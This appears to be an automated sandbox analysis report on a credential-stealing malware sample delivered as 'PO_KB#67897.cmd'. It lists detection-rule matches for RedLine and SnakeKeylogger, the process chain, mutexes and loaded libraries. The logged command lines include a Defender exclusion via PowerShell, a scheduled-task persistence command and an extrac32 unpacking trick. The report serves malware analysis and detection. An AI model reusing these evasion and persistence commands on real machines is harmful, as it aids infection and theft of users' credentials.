                        Source: 00000015.00000002.2463806238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0000001A.00000001.2405390189.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0000001F.00000001.2498527749.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 00000008.00000002.2209421224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: Process Memory Space: rpkhzpuO.pif PID: 3080, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: Process Memory Space: Microsofts.exe PID: 3248, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: Microsofts.exe.8.dr, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                        Source: Microsofts.exe.8.dr, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 8.3.rpkhzpuO.pif.2350ac48.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                        Source: 8.3.rpkhzpuO.pif.2350ac48.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                        Source: 8.3.rpkhzpuO.pif.2350ac48.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                        Source: 8.2.rpkhzpuO.pif.264e6478.10.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                        Source: 8.2.rpkhzpuO.pif.264e6478.10.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                        Source: 8.2.rpkhzpuO.pif.264e6478.10.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                        Source: 8.2.rpkhzpuO.pif.26523d90.12.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                        Source: 8.2.rpkhzpuO.pif.26523d90.12.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                        Source: 8.2.rpkhzpuO.pif.26523d90.12.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                        Source: apihost.exe.9.drBinary or memory string: }.sLn-
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winCMD@46/18@3/3
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B27F52 GetDiskFreeSpaceA,4_2_02B27F52
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_004019F0
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B36D48 CoCreateInstance,4_2_02B36D48
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_004019F0
                        Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\OupzhkprF.cmdJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7016:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6708:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3784:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4904:120:WilError_03
                        Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\user\AppData\Local\Temp\CAB00516.TMPJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A8_2_00413780
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A8_2_00413780
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A8_1_00413780
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A21_2_00413780
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A21_2_00413780
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A21_1_00413780
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A26_2_00413780
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A26_2_00413780
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A26_1_00413780
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A31_2_00413780
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A31_2_00413780
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A31_1_00413780
                        Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002AED000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002AAE000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3392030847.00000000039FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: PO_KB#67897.cmdVirustotal: Detection: 24%
                        Source: PO_KB#67897.cmdReversingLabs: Detection: 28%
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_KB#67897.cmd" "
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\PO_KB#67897.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: unknownProcess created: C:\Users\Public\Libraries\Oupzhkpr.PIF "C:\Users\Public\Libraries\Oupzhkpr.PIF"
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                        Source: unknownProcess created: C:\Users\Public\Libraries\Oupzhkpr.PIF "C:\Users\Public\Libraries\Oupzhkpr.PIF"
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                        Source: unknownProcess created: C:\Users\Public\Libraries\Oupzhkpr.PIF "C:\Users\Public\Libraries\Oupzhkpr.PIF"
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\PO_KB#67897.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pifJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /fJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" Jump to behavior
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msimg32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: url.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieframe.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: smartscreenps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttpcom.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??????????.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
